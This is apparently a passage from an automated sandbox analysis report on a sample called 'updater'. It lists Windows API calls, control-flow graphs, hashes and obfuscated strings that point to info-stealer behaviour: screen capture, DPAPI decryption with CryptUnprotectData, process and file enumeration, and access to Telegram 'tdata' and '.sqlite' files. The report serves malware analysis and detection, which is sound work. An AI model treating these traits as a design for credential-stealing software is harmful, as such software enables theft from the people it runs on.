FreeLibrary 3732->3735 3736 13da871-13da878 3732->3736 3735->3661 3736->3735 3739 13da87a-13da881 3736->3739 3739->3735 3743 13da883-13da88a 3739->3743 3740->3729 3743->3735 3746 13da88c-13da893 3743->3746 3746->3735 3749 13da895-13da897 3746->3749 3749->3735 3751 13da899-13da8a2 3749->3751 3751->3664
                                  APIs
                                  • LoadLibraryA.KERNEL32(01465C78), ref: 013DA5B7
                                  • GetProcAddress.KERNEL32(00000000,0146606C), ref: 013DA645
                                  • GetProcAddress.KERNEL32(01465180), ref: 013DA754
                                  • GetProcAddress.KERNEL32(00000000), ref: 013DA76E
                                  • GetProcAddress.KERNEL32(00000000), ref: 013DA7D7
                                  • GetProcAddress.KERNEL32(01464F88), ref: 013DA6CA
                                    • Part of subcall function 0141DB91: EnterCriticalSection.KERNEL32(01463CAC,?,7365FFF6,?,013C416B,014654D0,00000000), ref: 0141DB9C
                                    • Part of subcall function 0141DB91: LeaveCriticalSection.KERNEL32(01463CAC,?,013C416B,014654D0,00000000), ref: 0141DBD9
                                  • GetProcAddress.KERNEL32(01466088), ref: 013DA861
                                    • Part of subcall function 0141DB47: EnterCriticalSection.KERNEL32(01463CAC,69494B7C,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB51
                                    • Part of subcall function 0141DB47: LeaveCriticalSection.KERNEL32(01463CAC,?,013C4193,014654D0,0144549D,?,7365FFF6,00000000), ref: 0141DB84
                                    • Part of subcall function 0141DB47: RtlWakeAllConditionVariable.NTDLL ref: 0141DBFB
                                  • FreeLibrary.KERNEL32 ref: 013DA8AA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$CriticalSection$EnterLeaveLibrary$ConditionFreeLoadVariableWake
                                  • String ID: .$XO[BZMBG$gZKC
                                  • API String ID: 2402374661-770554371
                                  • Opcode ID: 0325afdf4ce1166ecbb6cd8a4ed9218b557965fc8624c3566de651b0fa24ed02
                                  • Instruction ID: d6d2b85fa4ed95bcbde282cc30491b4d7af80811547cb58806302bf8a3cff5aa
                                  • Opcode Fuzzy Hash: 0325afdf4ce1166ecbb6cd8a4ed9218b557965fc8624c3566de651b0fa24ed02
                                  • Instruction Fuzzy Hash: 229111B6900282DEDF25EFA9F54865D7FB0BB1132CF1A011ED560AB2B9CB745481CB53
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50
                                  • KiUserCallbackDispatcher.NTDLL ref: 013DB8AB
                                  • GetSystemMetrics.USER32 ref: 013DB8B4
                                  • GetDC.USER32(00000000), ref: 013DB8BB
                                  • SelectObject.GDI32(00000000,00000000), ref: 013DB8E5
                                  • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 013DB8FE
                                    • Part of subcall function 013C4619: InitializeCriticalSectionEx.KERNEL32(01464D88,00000000,00000000,?,013C471E,?,?,013C46CC), ref: 013C465C
                                    • Part of subcall function 013C4619: GetLastError.KERNEL32(?,013C471E,?,?,013C46CC), ref: 013C4666
                                  • EnterCriticalSection.KERNEL32(00000004), ref: 013DB937
                                  • LeaveCriticalSection.KERNEL32(00000004), ref: 013DB941
                                    • Part of subcall function 013C4BCB: GetObjectA.GDI32(?,00000054,?), ref: 013C4BDF
                                  • DeleteDC.GDI32(?), ref: 013DB96F
                                  • DeleteObject.GDI32(00000000), ref: 013DB976
                                  • ReleaseDC.USER32(00000000,?), ref: 013DB981
                                    • Part of subcall function 013C46E3: DeleteObject.GDI32(?), ref: 013C4711
                                    • Part of subcall function 013C46E3: EnterCriticalSection.KERNEL32(00000004,?,?,013C46CC), ref: 013C4724
                                    • Part of subcall function 013C46E3: LeaveCriticalSection.KERNEL32(00000004,?,?,?,?,?,013C46CC), ref: 013C4738
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$Object$Delete$EnterLeave$CallbackDeallocateDispatcherErrorInitializeLastMetricsReleaseSelectSystemUser
                                  • String ID: (\;
                                  • API String ID: 1025157159-1847211318
                                  • Opcode ID: 5db2a7f9ec3cecce280371ff283b3a54c782a4a8656f66268d67a81031695e21
                                  • Instruction ID: c863e2e36b0a6a9f34aff27ba88a21ffa4d2e8b0db7f0e677f7101ec0b144226
                                  • Opcode Fuzzy Hash: 5db2a7f9ec3cecce280371ff283b3a54c782a4a8656f66268d67a81031695e21
                                  • Instruction Fuzzy Hash: 0A51AD35D0125AEFEB14EBB4ED44BEEBBB8EF25314F10419AE509A31A0DB701E45CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 4314 14061b5-140621d 4315 140622b-1406230 4314->4315 4316 140621f-1406221 4314->4316 4318 1406232-1406235 4315->4318 4319 140624c-140624e 4315->4319 4316->4315 4317 1406223-1406226 4316->4317 4323 14064d8-14064f5 call 141e288 4317->4323 4318->4319 4320 1406237-140623d 4318->4320 4321 1406254-140625d 4319->4321 4322 14064d6 4319->4322 4324 1406243-1406249 4320->4324 4325 140623f-1406241 4320->4325 4326 14062cf-14062f8 call 14064fd 4321->4326 4327 140625f-1406262 4321->4327 4322->4323 4324->4319 4325->4319 4325->4324 4337 14064cc-14064cd call 1405d9c 4326->4337 4338 14062fe-140631f call 1405c8d 4326->4338 4329 1406270-140627f GetLongPathNameW 4327->4329 4330 1406264-140626a 4327->4330 4335 1406281-1406287 GetLastError 4329->4335 4336 140628c-1406297 4329->4336 4330->4329 4334 140626c-140626e 4330->4334 4334->4326 4334->4329 4335->4323 4339 14062a0-14062c3 4336->4339 4340 1406299-140629e 4336->4340 4345 14064d2-14064d4 4337->4345 4346 1406422-140642f GetFileInformationByHandle 4338->4346 4347 1406325-140632b 4338->4347 4339->4322 4343 14062c9 4339->4343 4340->4326 4340->4339 4343->4326 4345->4323 4350 1406353-140635b GetLastError 4346->4350 4351 1406435-1406470 4346->4351 4348 1406386-1406388 4347->4348 4349 140632d-140632f 4347->4349 4353 14063d0-14063d2 4348->4353 4354 140638a-14063ad 4348->4354 4349->4348 4352 1406331-1406351 4349->4352 4350->4337 4355 14064c1-14064c3 4351->4355 4356 1406472-140647a 4351->4356 4352->4350 4372 1406360-1406383 4352->4372 4359 14063d4-14063f0 4353->4359 4360 1406417-1406419 4353->4360 4354->4350 4370 14063af-14063cd 4354->4370 4361 14064c9-14064cb 4355->4361 4362 140641b-140641d 4355->4362 4357 14064ba 4356->4357 4358 140647c-140649c FindFirstFileExW 4356->4358 4365 14064be 4357->4365 4358->4350 4364 14064a2-14064b8 FindClose 4358->4364 4359->4350 4373 14063f6-1406414 4359->4373 4360->4346 4360->4362 4361->4337 4362->4337 4364->4365 4365->4355 4370->4353 4372->4348 4373->4360
                                  APIs
                                  • GetLongPathNameW.KERNEL32(?,00000000,?), ref: 01406277
                                  • GetLastError.KERNEL32 ref: 01406281
                                  • ___std_fs_open_handle@16.LIBCPMT ref: 014062E9
                                  • GetLastError.KERNEL32 ref: 01406353
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast$LongNamePath___std_fs_open_handle@16
                                  • String ID: GetFileInformationByHandleEx$kernel32.dll
                                  • API String ID: 2391694696-1782754588
                                  • Opcode ID: 907b12f5617fb910a7d5b8adde2d9c17cfe3ca8fe3356472011b2aac70c7bf8e
                                  • Instruction ID: bf1dded0e1b31a759238c51609dc340e2ed196c6a6873adc82a105028bca7289
                                  • Opcode Fuzzy Hash: 907b12f5617fb910a7d5b8adde2d9c17cfe3ca8fe3356472011b2aac70c7bf8e
                                  • Instruction Fuzzy Hash: 80A180759002159FDB25CF29C844BAABBB4BF04320F1546BAED25EB3E1E770D951CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 4374 13c7d35-13c7d4a 4375 13c7d4c-13c7d51 4374->4375 4376 13c7d56-13c7d5a 4374->4376 4377 13c7fbf-13c7fc5 4375->4377 4378 13c7d5c-13c7d61 4376->4378 4379 13c7d66-13c7d8e call 1422d00 4376->4379 4378->4377 4382 13c7d9a 4379->4382 4383 13c7d90-13c7d95 4379->4383 4384 13c7da1-13c7da4 4382->4384 4383->4377 4385 13c7da9-13c7dae 4384->4385 4386 13c7da6 4384->4386 4385->4384 4387 13c7db0-13c7dd6 call 13c740e call 13c799d 4385->4387 4386->4385 4387->4377 4392 13c7ddc-13c7e7f call 1422d00 * 2 _strlen call 1422d00 4387->4392 4399 13c7e89-13c7e9c 4392->4399 4400 13c7e81-13c7e84 4392->4400 4401 13c7eae-13c7eb1 4399->4401 4402 13c7e9e-13c7ea3 4399->4402 4400->4399 4404 13c7eb5-13c7fb1 call 141f730 call 13c69f6 4401->4404 4402->4401 4403 13c7ea5-13c7eac 4402->4403 4403->4404 4409 13c7fc8-13c7fda 4404->4409 4410 13c7fb3-13c7fb5 call 13c7be2 4404->4410 4411 13c7fdc-13c7fe6 call 13c7be2 4409->4411 4412 13c7fe8-13c8001 4409->4412 4417 13c7fba 4410->4417 4411->4377 4415 13c8016-13c801d 4412->4415 4416 13c8003-13c8007 4412->4416 4420 13c801f-13c8035 GetDesktopWindow GetTickCount call 1422ceb 4415->4420 4421 13c8036 4415->4421 4416->4415 4419 13c8009-13c8014 call 13c73a6 4416->4419 4417->4377 4419->4415 4419->4416 4420->4421 4424 13c8038-13c8048 call 1422cca 4421->4424 4429 13c804a-13c8053 4424->4429 4430 13c8057-13c806b call 13c73ed 4429->4430 4433 13c806d-13c8071 4430->4433 4434 13c8087-13c809d 4433->4434 4435 13c8073-13c8085 call 13c7813 4433->4435 4437 13c809f-13c80a6 call 13c7c23 4434->4437 4438 13c80b1-13c80b3 4434->4438 4435->4434 4444 13c80ab-13c80af 4437->4444 4441 13c8108-13c8125 call 13c7be2 4438->4441 4442 13c80b5-13c80be 4438->4442 4441->4377 4449 13c812b-13c8130 4441->4449 4445 13c80e0-13c80f3 call 13c7b49 4442->4445 4444->4441 4450 13c80f5-13c80fe 4445->4450 4451 13c80c0-13c80c3 4445->4451 4449->4417 4452 13c8136-13c8155 4449->4452 4453 13c8104 4450->4453 4451->4450 4456 13c80c5-13c80d6 call 13c7813 4451->4456 4454 13c81cb-13c81d4 4452->4454 4455 13c8157-13c815a 4452->4455 4453->4441 4458 13c81da-13c81dc 4454->4458 4459 13c827b-13c8280 4454->4459 4455->4454 4460 13c815c-13c816c 4455->4460 4467 13c80dc 4456->4467 4468 13c81be-13c81c6 4456->4468 4462 13c81de-13c81e0 4458->4462 4463 13c81e6-13c81f3 call 13c6c5d 4458->4463 4459->4377 4464 13c816e-13c8176 4460->4464 4465 13c817b-13c8191 call 13c78e2 4460->4465 4462->4459 4462->4463 4463->4417 4472 13c81f9-13c8202 4463->4472 4464->4465 4473 13c81b4-13c81b9 4465->4473 4474 13c8193-13c81a0 call 13c69f6 4465->4474 4467->4445 4468->4453 4475 13c8207-13c820c 4472->4475 4473->4377 4474->4417 4480 13c81a6-13c81b2 call 13c78e2 4474->4480 4475->4377 4477 13c8212-13c825b call 141e00b call 141f730 call 141dc67 call 141f730 4475->4477 4490 13c825d-13c8260 4477->4490 4491 13c8264-13c826c 4477->4491 4480->4473 4480->4475 4492 13c8274-13c8276 4490->4492 4493 13c826e 4491->4493 4494 13c8262 4491->4494 4492->4377 4493->4492 4494->4491
                                  APIs
                                  • GetDesktopWindow.USER32 ref: 013C801F
                                  • GetTickCount.KERNEL32(?,?,014543AB), ref: 013C8027
                                    • Part of subcall function 013C7BE2: CloseHandle.KERNEL32(00000000), ref: 013C7BF7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCountDesktopHandleTickWindow
                                  • String ID: UT
                                  • API String ID: 3281157955-894488996
                                  • Opcode ID: 01848ab54ea4a807591111b279231b41262d215aab2c4157442cdaf6ccc286fc
                                  • Instruction ID: 1f049c16317f200b26c3c5d98c245cafa3070c848317cc28c451db0329f0ef8e
                                  • Opcode Fuzzy Hash: 01848ab54ea4a807591111b279231b41262d215aab2c4157442cdaf6ccc286fc
                                  • Instruction Fuzzy Hash: C7F1AE71608742AFD715DF69C484BAAFBE4BF95708F04482EE98587351EB30E948CF92
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$DeallocateEnterLeave$ConditionVariableWake
                                  • String ID: (size: $.$.$.sqlite$@$M$ZO$bAIG$jOZO$mAAEGK].
                                  • API String ID: 4060657020-1872904414
                                  • Opcode ID: 10485a07fe36493587162b445db790a476257d0cef31ea2cff91cf9db46c2370
                                  • Instruction ID: 76829cb676b33ee5af900949c01bb073c3550bef696bdf6df49482e2a58de651
                                  • Opcode Fuzzy Hash: 10485a07fe36493587162b445db790a476257d0cef31ea2cff91cf9db46c2370
                                  • Instruction Fuzzy Hash: 23B27A72D0425ADEDF15EBA8D890BEDBBB4AF24308F1041EDD4096B291EB705F49CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$ConditionVariableWake
                                  • String ID: (\;$.$@HGI$@r$B$]]H@$rMA@HGI.$}ZKO$}ZKOC~OZF.
                                  • API String ID: 2013694253-205258442
                                  • Opcode ID: b18adbcd16504d8a9b5a9836719bf645bf633dbfc99aeb200ae3a2fb02da463c
                                  • Instruction ID: 58dae0777cdd66a4c8336da6ab95a82a86fc369699a673bfb21d265cc1e93a6e
                                  • Opcode Fuzzy Hash: b18adbcd16504d8a9b5a9836719bf645bf633dbfc99aeb200ae3a2fb02da463c
                                  • Instruction Fuzzy Hash: AF92AB31D04299DEDF25EBA8D894BDDBBB5AF24308F1441DED4096B2A1DB701E89CF21
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$ConditionVariableWake
                                  • String ID: #$(\;$)\tdata\$.$.$\tdata\$m.$map$zKBKI\OC
                                  • API String ID: 2013694253-29942256
                                  • Opcode ID: 6c0b80f7e0415309114fbd5d4d2c4251d8fc4bf14e403608b6473b0c136516b0
                                  • Instruction ID: 5705ad1d30952c6e4a979220b1b28f3532218e0e45e69bc8f37ce1e5d13f0c3a
                                  • Opcode Fuzzy Hash: 6c0b80f7e0415309114fbd5d4d2c4251d8fc4bf14e403608b6473b0c136516b0
                                  • Instruction Fuzzy Hash: 1042BD71D0025ADBDF24EBA8D894BDDBBB4AF25308F1041EED449A7291DB705E88CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave$ConditionVariableWake
                                  • String ID: (\;$.$.txt$PlayerName$r.${]K\]r${}k|jozo
                                  • API String ID: 2013694253-334844750
                                  • Opcode ID: 864134fe9463fd46e622812077fbba67faf6fe5618b4d39093ee305d6e7f5d8e
                                  • Instruction ID: 72a174876b84e750a0c7ba04c2e32f2dc8a3836a1aa42a47a6e5a14124c8b8dd
                                  • Opcode Fuzzy Hash: 864134fe9463fd46e622812077fbba67faf6fe5618b4d39093ee305d6e7f5d8e
                                  • Instruction Fuzzy Hash: A6220472D04285CEDB14EFA8E448BDDFBB0AF26318F25019ED0516B2B9CBB45A45CB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0144E0E8), ref: 01433C5E
                                  • _free.LIBCMT ref: 01433C4C
                                    • Part of subcall function 01430123: HeapFree.KERNEL32(00000000,00000000), ref: 01430139
                                    • Part of subcall function 01430123: GetLastError.KERNEL32(?,?,0142DA9C), ref: 0143014B
                                  • _free.LIBCMT ref: 01433E18
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                  • String ID: Pacific Daylight Time$Pacific Standard Time
                                  • API String ID: 2155170405-1154798116
                                  • Opcode ID: 0cd0e583f44555f5f9797965f4d493714e1dfe2cd1847c16f93de4ad1e6039c0
                                  • Instruction ID: e791c73cf4a51b96e289aea35fd8f421a62e4ab8344ae38caebbc1ddf1bf3d58
                                  • Opcode Fuzzy Hash: 0cd0e583f44555f5f9797965f4d493714e1dfe2cd1847c16f93de4ad1e6039c0
                                  • Instruction Fuzzy Hash: CC511C71C00216ABDB24DF6ADC809AA77BCFFA9314F15026FE560A72B0E7349D41CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • FindClose.KERNEL32(000000FF,?,01406136,?,?,?,?,013C2C64,?,?,?,?), ref: 01406113
                                  • FindFirstFileExW.KERNEL32(000000FF,00000001,?,00000000,00000000,00000000,?,?,?,?,?,01406136,?), ref: 01406143
                                  • GetLastError.KERNEL32(?,?,?,?,01406136,?,?,?,?,013C2C64,?,?,?,?), ref: 01406150
                                  • FindFirstFileExW.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,?,?,?,?,01406136,?,?,?,?,013C2C64), ref: 0140616A
                                  • GetLastError.KERNEL32(?,?,?,?,01406136,?,?,?,?,013C2C64,?,?,?,?), ref: 01406177
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$ErrorFileFirstLast$Close
                                  • String ID:
                                  • API String ID: 569926201-0
                                  • Opcode ID: 7317845be2016179a759c9be0f6391a0c0cc3f14bd021bd40df29440f0278881
                                  • Instruction ID: 599cbf167b8131e3034951626a6cf1bc4bb88aa1f2950c0a8b5eebee28aa9eae
                                  • Opcode Fuzzy Hash: 7317845be2016179a759c9be0f6391a0c0cc3f14bd021bd40df29440f0278881
                                  • Instruction Fuzzy Hash: C3016D75000185BBCB321F669C08C5B7E79EB92761B11452AFA6A892F6C7318472DB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetCurrentProcess.KERNEL32(?,?,0142277F,?,?,?,?,?,01423E8D), ref: 014227A2
                                  • TerminateProcess.KERNEL32(00000000,?,0142277F,?,?,?,?,?,01423E8D), ref: 014227A9
                                  • ExitProcess.KERNEL32 ref: 014227BB
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CurrentExitTerminate
                                  • String ID:
                                  • API String ID: 1703294689-0
                                  • Opcode ID: 78d3b88d4c571596333f1b6b8c901afd96361daccfe625a82118f8872348c0aa
                                  • Instruction ID: 3d7dbf3abd49cb39c6174362c6c1e902d79e5cf5f1a4722c455b56e291e7d4f2
                                  • Opcode Fuzzy Hash: 78d3b88d4c571596333f1b6b8c901afd96361daccfe625a82118f8872348c0aa
                                  • Instruction Fuzzy Hash: A7E08C3A000118AFCF226F69D848E493F39FFA4693B404819F9048A235CB76D882CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CryptUnprotectData.CRYPT32(Jx~`.,00000000,00000000,00000000,00000000,00000000,?,?,-00000046,00000000), ref: 013D273D
                                    • Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CryptDataDeallocateUnprotect
                                  • String ID: r`A\Jx~`.
                                  • API String ID: 174072602-705364654
                                  • Opcode ID: eff30e25ce51fe50e4fe6dfe7ba3ee76b98f180088475ba475fa90c54c2ae23f
                                  • Instruction ID: fa8d7f346289746d5e404b7b6564c8bf3d009b558731b753dc768181b40c49ae
                                  • Opcode Fuzzy Hash: eff30e25ce51fe50e4fe6dfe7ba3ee76b98f180088475ba475fa90c54c2ae23f
                                  • Instruction Fuzzy Hash: 04114F76D0020AAFDB15DFE9E4909EEFBB8FF58204F00455EE511A3290DB745A08CBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Process32Next.KERNEL32(?,00000128,?,?,?), ref: 013D66E6
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,00000001,00000000), ref: 013D65DE
                                    • Part of subcall function 013DDF41: _Deallocate.LIBCONCRT ref: 013DDF50
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true
                                  • Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_13c0000_updater.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateDeallocateNextProcess32SnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 2624477505-0
                                  • Opcode ID: d4aa161dabff5bef0f8065109e936fbb0c199586fbf61f58274d344f6669b8d8
                                  • Instruction ID: 399c47c9c0b4f7f5bf4a9d5c04583ffdfd471ffb9cf92a68a934208f09f3783b
                                  • Opcode Fuzzy Hash: d4aa161dabff5bef0f8065109e936fbb0c199586fbf61f58274d344f6669b8d8
                                  • Instruction Fuzzy Hash: 5A510AB2D0020ADFDF10DFA9D9809EEBBB9AF58304F14416EE515A3290DB749A45CFA1
                                  Uniqueness

